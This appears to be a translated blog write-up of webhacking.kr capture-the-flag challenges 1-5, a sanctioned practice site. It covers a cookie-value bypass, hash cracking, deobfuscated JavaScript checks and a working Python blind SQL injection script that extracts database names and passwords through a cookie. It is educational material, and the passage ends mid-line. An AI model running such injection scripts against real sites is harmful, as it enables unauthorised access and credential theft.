It really is webhacking: even registering an account has style ^_^. Capturing the traffic with Burp shows that the source can be accessed as follows
There is also a "decode me" string: base64-decode it three times and you get an IP value, after which the challenges can begin!
Challenge 1
The page hands you this code right away
<?php
if(!$_COOKIE['user_lv'])
{
SetCookie("user_lv","1");          // first visit: start at level 1 and reload
echo("<meta http-equiv=refresh content=0>");
}
?>
<html>
<head>
<title>Challenge 1</title>
</head>
<body bgcolor=black>
<center>
<br><br><br><br><br>
<font color=white>
---------------------<br>
<?php
$password="????";
// eregi() (deprecated in PHP 5.3, removed in PHP 7) resets the level if the cookie contains anything other than digits, comma or dot
if(eregi("[^0-9,.]",$_COOKIE['user_lv'])) $_COOKIE['user_lv']=1;
// 6 and above is reset as well, so the value has to stay below 6 ...
if($_COOKIE['user_lv']>=6) $_COOKIE['user_lv']=1;
// ... yet be strictly greater than 5 to reach solve()
if($_COOKIE['user_lv']>5) @solve();
echo("<br>level : $_COOKIE[user_lv]");
?>
<br>
<pre>
<a onclick=location.href='index.phps'>----- index.phps -----</a>
</body>
</html>
Now look at what eregi matches: [^0-9,.]
It matches any character other than a digit, a dot or a comma; if it finds one, the cookie value is reset to 1, otherwise the value is kept as is. Note that the dot is allowed. Since 6 and above is reset to 1 but solve() needs a value greater than 5, what we need is a decimal between 5 and 6. Any such value works, e.g. user_lv=5.5.
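To see exactly which cookie values slip past the eregi() allowlist and the two comparisons, here is an added Python replay of the check (example code, not part of the original post or of the challenge). The filter and both comparisons mirror the PHP above; the leading-numeric-prefix coercion in php_number() is an assumption about the PHP version the site runs (PHP 5/7 semantics).

```python
import re

# Challenge 1's check, replayed offline. The filter and comparisons are the ones in the PHP above;
# the numeric coercion below is an assumption about the PHP version (5.x/7.x semantics).
FILTER = re.compile(r"[^0-9,.]")


def php_number(s):
    """Leading-numeric-prefix coercion used by PHP 5/7 when a string meets a number in >= or >;
    a string with no numeric prefix counts as 0. (PHP 8 compares non-numeric strings differently.)"""
    m = re.match(r"\d+\.?\d*|\.\d+", s)
    return float(m.group(0)) if m else 0.0


def level_check(user_lv):
    """Return (level the page echoes, whether solve() is reached) for one user_lv cookie value."""
    lv = user_lv or "1"            # missing/empty cookie: the page sets it to 1 and reloads
    if FILTER.search(lv):          # eregi("[^0-9,.]") hit: reset to 1
        lv = "1"
    if php_number(lv) >= 6:        # upper bound: 6 and above is reset too
        lv = "1"
    return lv, php_number(lv) > 5  # lower bound: strictly above 5 calls solve()


def bypass_values(candidates):
    """Filter a list of cookie values down to those that reach solve()."""
    return [c for c in candidates if level_check(c)[1]]


if __name__ == "__main__":
    for v in ["5", "6", "5.5", "5.999", "5a", "5,5", " 5.5", ""]:
        print(repr(v), "->", level_check(v))
```

The comma is also on the allowlist, but under PHP 5/7 a value like 5,5 only coerces to its prefix 5, so the dot is the character that matters.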
Challenge 2
This level isn't entirely my own work... mainly because I really couldn't figure it out. First a directory scan turned up an /admin/ backend. I tried it and found no injection point (at first I was fixated on injection and assumed my skills were simply too poor). According to the hint, though, it is cookie injection... and by chance I noticed this thing
Occasionally the displayed time shows error???, and if the timestamp cookie is left unchanged, the time shown does not change either. So I tried a blind injection through the time cookie, and it successfully dumped the name of the current database
# _*_ coding:utf-8 _*_
import requests

url = 'http://webhacking.kr/challenge/web/web-02/'
temp = 0

def search2(content, pos, l, r):
    """Binary search for the ascii code of character `pos` of the SQL expression `content`,
    using the timestamp comment in the response as the true/false oracle."""
    global temp
    if l > r:
        return
    mid = (l + r) // 2
    inject = '23333333 and 1=(select ascii(substr(' + content + ' from ' + str(pos) + '))>=' + str(mid) + ')'
    print(inject)
    cookies = {
        'time': inject, 'PHPSESSID': '136de2147ed2139e37dceda9c0d90144', 'td_cookie': '18446744072591562357'}
    html = requests.get(url, cookies=cookies).text
    if '<!--2070-01-01 09:00:01-->' in html:   # condition true: the character is >= mid
        temp = mid
        search2(content, pos, mid + 1, r)
    else:
        search2(content, pos, l, mid - 1)

def get_database():
    global temp
    db = ''
    for i in range(1, 50):
        temp = 0
        search2('database()', i, 1, 130)
        if temp == 0:      # ascii 0: past the end of the string
            break
        db += chr(temp)
        print(db)

get_database()
But that was as far as it went, because keywords like table_name are filtered... which left me stuck: what exactly do we need to know? My guess was a column called password and a table called admin... and it worked??
# search2() is unchanged from the script above; only the probe expression differs
def get_password():
    global temp
    password = ''
    for i in range(1, 50):
        temp = 0
        search2('(select password from admin)', i, 1, 130)
        if temp == 0:
            break
        password += chr(temp)
        print(password)

# get_database()
# database() came back as webhacking (0x7765626861636b696e67 in hex)
get_password()
Try logging in at /admin/ and you see
-Be careful not to let the administrator password leak.
-If you are using this for the first time, refer to the manual. (manual password: @dM1n__nnanual)
But our target seems to be here
Hmm... but what use is this hint... I tried it, and it is not the password; yet another baffling leap of logic...
Yes, you guessed it: this place has a password column as well... I... just dump it directly, by adding this code
def get_password():
    global temp
    password = ''
    for i in range(1, 50):
        temp = 0
        search2('(select password from FreeB0aRd)', i, 1, 140)
        if temp == 0:
            break
        password += chr(temp)
        print(password)
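The scripts above run the same binary search against the live site. As an added example (not the original post's code), here is the technique replayed offline: MockChallenge2 is a constructed stand-in for the page, built on SQLite with the two tables the post queries. The query the time cookie is spliced into, the sample admin password, and the way filtered keywords are rejected are all assumptions, since the post shows none of them; the FreeB0aRd value and the oracle comment are the ones the post reports. The payload uses substr(x,pos), which MySQL accepts as well as SQLite, so the same string works against both engines.

```python
import sqlite3

TRUE_MARKER = "<!--2070-01-01 09:00:01-->"   # response fragment the post uses as its boolean oracle


class MockChallenge2:
    """Constructed stand-in for the challenge page. The real query is not in the post; the
    assumption here is that the `time` cookie lands unquoted in a numeric expression and the
    page echoes a timestamp whose last digit is that expression's truth value."""

    BLOCKED = ("table_name",)   # the post says such keywords are filtered; rejecting outright is an assumption

    def __init__(self):
        self.conn = sqlite3.connect(":memory:")
        # MySQL's ascii() does not exist in SQLite; register an equivalent (ascii('') is 0, as in MySQL)
        self.conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
        self.conn.executescript("""
            CREATE TABLE admin(password TEXT);
            CREATE TABLE FreeB0aRd(password TEXT);
            INSERT INTO admin VALUES ('nimda');          -- constructed; the post never prints it
            INSERT INTO FreeB0aRd VALUES ('7598522ae');  -- the value the post extracts
        """)
        self.requests = 0

    def get(self, cookies):
        """Serve one request; mirrors what a real requests.get(url, cookies=...) would return."""
        self.requests += 1
        raw = cookies["time"]
        if any(k in raw.lower() for k in self.BLOCKED):
            return "<!--error-->"
        try:
            (v,) = self.conn.execute("SELECT 0 + (%s)" % raw).fetchone()   # the injection point
        except sqlite3.Error:
            return "<!--error-->"        # the intermittent 'error' the post noticed
        return "<!--2070-01-01 09:00:0%d-->" % (1 if v else 0)


def payload(expr, pos, threshold):
    """Same shape as the post's cookie; substr(x,pos) instead of substr(x from pos) so MySQL and SQLite both accept it."""
    return "23333333 and 1=(select ascii(substr(%s,%d))>=%d)" % (expr, pos, threshold)


def extract(page, expr, maxlen=50, lo=1, hi=130):
    """Binary-search each character of `expr` through the oracle; stop at the first position
    whose ascii value is 0, i.e. past the end of the string."""
    out = ""
    for pos in range(1, maxlen + 1):
        l, r, best = lo, hi, 0
        while l <= r:
            mid = (l + r) // 2
            if TRUE_MARKER in page.get({"time": payload(expr, pos, mid)}):
                best, l = mid, mid + 1       # ascii >= mid holds: look higher
            else:
                r = mid - 1
        if best == 0:
            break
        out += chr(best)
    return out


if __name__ == "__main__":
    app = MockChallenge2()
    for e in ("(select password from admin)", "(select password from FreeB0aRd)"):
        print(e, "->", extract(app, e))
    print("requests used:", app.requests)
```

Each character costs about eight requests for a 1..130 search, which is why the post's recursive search2() with a global temp is the same algorithm written iteratively here; the blocked-keyword branch shows why information_schema was out of reach and table names had to be guessed.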
The password comes out easily: 7598522ae. After logging in there is a link to a compressed archive, what on earth???
The zip file has a password as well... presumably the one from the hint on the admin page. I tried it, and that was it; the page inside reveals the answer...
HacKed_by_n0b0dY
These leaps of logic are genuinely painful... I'm going to call the police... hello? Is 110 there?
Challenge 3
Enough already... this really is a pure guessing puzzle!!!! I even considered brute-forcing it, but that felt absurd... Looking at the grid, my guess was that the number on each row or column is the count of black cells to paint in: a 3 means three consecutive black cells, 1 1 1 means three black cells separated by gaps
Can you please not make it an actual math puzzle...
After that we reach this screen
It looks a lot more normal... I guessed injection, since the response reflected nothing, and damn, nothing worked... The answer submitted afterwards does seem injectable, since it echoes back
query error!
One round of fuzzing (no idea what it wanted) shows very little is left unfiltered
or, and, select and the like are all filtered, so it stopped looking like injection... heartbreaking, comrade... With no ideas left I read a writeup and learned that ||
is not filtered (in MySQL || is the logical OR operator unless the PIPES_AS_CONCAT SQL mode is set, so it stands in for the filtered or), but what is that approach supposed to be......
I'm really calling the police now, the leaps of logic are too much... it's either trivially easy or absurdly tricky...
Challenge 4
What is this thing??? First base64-decode it, which gives something that looks like a sha1 hash?
Run it through an online cracker and it resolves to
a94a8fe5ccb19ba61c4c0873d391e987982fbbd3
Damn... still a sha1? Crack that one as well and you get the answer...
test
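As an added example (not from the original post), the same unwrapping done with a small precomputed table instead of an online cracker. The puzzle string is rebuilt here with the structure the post describes, base64 over hex(sha1(hex(sha1('test')))), because the post does not quote the original string; WORDLIST is a constructed stand-in for a real dictionary.

```python
import base64
import hashlib

WORDLIST = ["123456", "password", "admin", "test", "qwerty"]   # constructed stand-in for a cracking dictionary
HEX = set("0123456789abcdef")


def looks_like_sha1(s):
    """40 hex characters: the shape the post recognised after the base64 step."""
    return len(s) == 40 and set(s.lower()) <= HEX


def build_table(words, depth=2):
    """Map sha1 hex digests back to their preimages, including digests-of-digests up to `depth`
    layers deep, which is what lets an online cracker answer these nested lookups."""
    table = {}
    frontier = list(words)
    for _ in range(depth):
        nxt = []
        for w in frontier:
            h = hashlib.sha1(w.encode()).hexdigest()
            table[h] = w
            nxt.append(h)
        frontier = nxt
    return table


def peel(blob, table):
    """Base64-decode, then unwind sha1 layers by lookup until the value is no longer a known digest.
    Returns (innermost value, number of sha1 layers removed)."""
    cur = base64.b64decode(blob).decode()
    layers = 0
    while looks_like_sha1(cur) and cur.lower() in table:
        cur = table[cur.lower()]
        layers += 1
    return cur, layers


def make_challenge(word="test", layers=2):
    """Constructed puzzle string with the post's structure: base64 over hex(sha1(hex(sha1(word))))."""
    cur = word
    for _ in range(layers):
        cur = hashlib.sha1(cur.encode()).hexdigest()
    return base64.b64encode(cur.encode()).decode()


if __name__ == "__main__":
    table = build_table(WORDLIST)
    print(peel(make_challenge(), table))
```

The inner digest is sha1("test") = a94a8fe5ccb19ba61c4c0873d391e987982fbbd3, exactly the value the cracker returned after the first step; the outer one is the sha1 of that 40-character hex string, which is why a second lookup was needed.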
Challenge 5
The page shows login and join buttons. The source reveals /mem/login.php, while the join button just pops an alert. But that was the wrong way to think about it!!! What a trick... the /mem/ directory is listable!!! and inside it there is a join.php as well. Surprise?
That yields a pile of source; after a bit of cleanup, the main code is as follows
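Rather than counting l's by hand, the obfuscated script quoted below can be resolved statically. The following is an added Python resolver (not part of the original post or of the challenge). The input it parses is constructed from that script: the letter and digit tables are regenerated (n copies of 'l' is the n-th letter, n copies of 'I' the n-th digit) and the two guards are copied verbatim. It assumes the obfuscation is nothing more than '+'-concatenation of string literals and aliases, which is all the quoted script uses.

```python
import re

# Constructed input: the challenge 5 script, with the alphabet and digit tables regenerated
# and the two eval(...).indexOf(...) guards copied verbatim from the quoted source.
ALPHABET = "".join("%s = '%s';\n" % ("l" * n, chr(ord("a") + n - 1)) for n in range(1, 27))
DIGITS = "".join("%s = '%s';\n" % ("I" * n, "1234567890"[n - 1]) for n in range(1, 11))
CHECKS = """
li = '.';
ii = '<';
iii = '>';
lIllIllIllIllIllIllIllIllIllIl = lllllllllllllll + llllllllllll + llll + llllllllllllllllllllllllll + lllllllllllllll + lllllllllllll + ll + lllllllll + lllll;
lIIIIIIIIIIIIIIIIIIl = llll + lllllllllllllll + lll + lllllllllllllllllllll + lllllllllllll + lllll + llllllllllllll + llllllllllllllllllll + li + lll + lllllllllllllll + lllllllllllllll + lllllllllll + lllllllll + lllll;
if (eval(lIIIIIIIIIIIIIIIIIIl).indexOf(lIllIllIllIllIllIllIllIllIllIl) == -1) { alert("Goodbye"); }
if (eval(llll + lllllllllllllll + lll + lllllllllllllllllllll + lllllllllllll + lllll + llllllllllllll + llllllllllllllllllll + li + 'U' + 'R' + 'L').indexOf(lllllllllllll + lllllllllllllll + llll + lllll + '=' + I) == -1) { alert('access_denied'); }
"""
SCRIPT = ALPHABET + DIGITS + CHECKS

ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+?);\s*$", re.M)   # name = expr;
TERM = re.compile(r"'([^']*)'|([A-Za-z_]\w*)")                       # quoted literal or identifier
CHECK = re.compile(r"eval\(([^)]*)\)\.indexOf\(([^)]*)\)")           # eval(X).indexOf(Y)


def parse_assignments(js):
    """Collect every `name = expr;` line; the values stay as unresolved expressions."""
    return dict(ASSIGN.findall(js))


def resolve(expr, env, _seen=()):
    """Evaluate a '+'-chain of string literals and obfuscated identifiers to its plain string."""
    out = []
    for lit, name in TERM.findall(expr):
        if name:
            if name in _seen:
                raise ValueError("cyclic definition: " + name)
            out.append(resolve(env[name], env, _seen + (name,)))
        else:
            out.append(lit)
    return "".join(out)


def decode_checks(js):
    """Return (what eval() reads, what it must contain) for each eval(...).indexOf(...) guard."""
    env = parse_assignments(js)
    return [(resolve(src, env), resolve(needle, env)) for src, needle in CHECK.findall(js)]


if __name__ == "__main__":
    for src, needle in decode_checks(SCRIPT):
        print("%s must contain %r" % (src, needle))
```

Resolved, the two guards read: document.cookie must contain "oldzombie", and document.URL must contain "mode=1"; both are client-side checks, so they only describe the cookie and query string the page expects.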
<script>
l = 'a';
ll = 'b';
lll = 'c';
llll = 'd';
lllll = 'e';
llllll = 'f';
lllllll = 'g';
llllllll = 'h';
lllllllll = 'i';
llllllllll = 'j';
lllllllllll = 'k';
llllllllllll = 'l';
lllllllllllll = 'm';
llllllllllllll = 'n';
lllllllllllllll = 'o';
llllllllllllllll = 'p';
lllllllllllllllll = 'q';
llllllllllllllllll = 'r';
lllllllllllllllllll = 's';
llllllllllllllllllll = 't';
lllllllllllllllllllll = 'u';
llllllllllllllllllllll = 'v';
lllllllllllllllllllllll = 'w';
llllllllllllllllllllllll = 'x';
lllllllllllllllllllllllll = 'y';
llllllllllllllllllllllllll = 'z';
I = '1';
II = '2';
III = '3';
IIII = '4';
IIIII = '5';
IIIIII = '6';
IIIIIII = '7';
IIIIIIII = '8';
IIIIIIIII = '9';
IIIIIIIIII = '0';
li = '.';
ii = '<';
iii = '>';
lIllIllIllIllIllIllIllIllIllIl = lllllllllllllll + llllllllllll + llll + llllllllllllllllllllllllll + lllllllllllllll + lllllllllllll + ll + lllllllll + lllll;   // resolves to "oldzombie"
lIIIIIIIIIIIIIIIIIIl = llll + lllllllllllllll + lll + lllllllllllllllllllll + lllllllllllll + lllll + llllllllllllll + llllllllllllllllllll + li + lll + lllllllllllllll + lllllllllllllll + lllllllllll + lllllllll + lllll;   // resolves to "document.cookie"
if (eval(lIIIIIIIIIIIIIIIIIIl).indexOf(lIllIllIllIllIllIllIllIllIllIl) == -1) {   // document.cookie must contain "oldzombie"
alert("Goodbye");
}
if (eval(llll + lllllllllllllll + lll + lllllllllllllllllllll + lllllllllllll + lllll + llllllllllllll + llllllllllllllllllll + li + 'U' + 'R' + 'L').indexOf(lllllllllllll + lllllllllllllll + llll + lllll + '=' + I) == -1) {   // document.URL must contain "mode=1"
alert('access_denied');
history.go(-1);
} else {
document.write('<font size=2 color=white>